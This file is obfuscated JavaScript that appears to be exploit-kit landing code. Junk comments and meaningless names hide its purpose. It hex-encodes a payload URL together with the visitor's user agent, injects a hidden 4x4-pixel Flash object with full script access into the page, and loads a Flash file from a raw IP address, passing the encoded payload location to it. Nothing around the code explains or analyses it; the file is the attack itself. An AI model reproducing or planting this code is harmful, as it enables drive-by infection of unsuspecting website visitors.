/*s16764d55589hssfj18460fs*/function hgfgerdfgdf(num, width){/*s80660d96830hfj14813fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s39409d83599hfj75196fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s17998d96556hfj77887fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s28711d89504hfj6947fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd24856hfs*/c += b + d;/*s22876d37280hfj55224fs*/e += 1;}return c;}/*s16894dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://92.53.124.245/?ODc3MTE5MzQ=&pa=xX_QMvWdbRXQC53EKvncT6NHMVHRHECL2YydmrHTefjaeVWkzrLFTF_xozKASASG6_JtdfJSD&ma=QPmjxeCewRgmtxcUVhB9fuq2EPcyEKdgcKF_x3ZYwgX_ZqXE-Bt2lr8mbAkecMlwRKy6CIXmg&work=MzIyMzg0NTk=", ghnvbn("http://92.53.124.245/?MTAxMDU2MzAy&ma=hm48PUFsT9quo3EDWyxTO0pWGqxeEYAgR_pDAE7MzjFz3nbMWeMoglhfU7mBZmugtVFsZ5gsTmKz7S6CJrg&pa=xHzQMrPYbR7FFYPfKPrEUKdEMU3WA0eKwYyZhazVF5-xFDTGpbL1Fx_spVydCFyEmvFvdLAHIwKh1UfASwd&shop=MzY5Njk4NTM=","wexykukusw"));